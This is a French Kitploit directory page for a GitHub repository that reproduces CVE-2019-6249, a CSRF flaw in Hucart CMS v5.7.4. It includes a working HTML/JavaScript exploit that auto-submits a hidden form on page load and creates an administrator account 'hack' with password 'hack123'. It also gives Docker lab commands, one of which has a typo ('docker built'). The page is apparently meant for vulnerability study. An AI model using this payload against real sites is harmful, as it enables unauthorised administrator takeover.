Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms Environnement de reproduction | Kitploit
Outils/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms Environnement de reproduction

Voir le dépôt
12il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-6249_Hucart cms

Résumé de la vulnérabilité

Nom de la vulnérabilité : Hucart cms v5.7.4 CSRF permettant d'ajouter arbitrairement un compte administrateur
Date de signalement : 2019-01-13
Découvreur : AllenChen ([email protected])
Page d'accueil du produit : http://www.hucart.com/
Lien du logiciel : http://www.hucart.com/
Version : v5.7.4
Identifiant CVE : CVE-2019-6249

Aperçu de la vulnérabilité

Hucart cms v5.7.4 présente une vulnérabilité CSRF. Lorsqu'un administrateur est connecté et accède à la page de test CSRF ci-dessous, un compte administrateur nommé hack peut être ajouté.

Code d'exploitation

Le code d'exploitation est le suivant : Ajoute un compte administrateur nommé hack avec le mot de passe hack123.

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

Références

  • Site chinois de demande CVE : http://www.iwantacve.cn/index.php/archives/109/
  • Site officiel CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db : https://www.exploit-db.com/exploits/46149

Reproduction de l'environnement (Docker)

Dans l'environnement Docker, exécutez les commandes suivantes :

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

Courriel original : [email protected]

Télécharger l’outil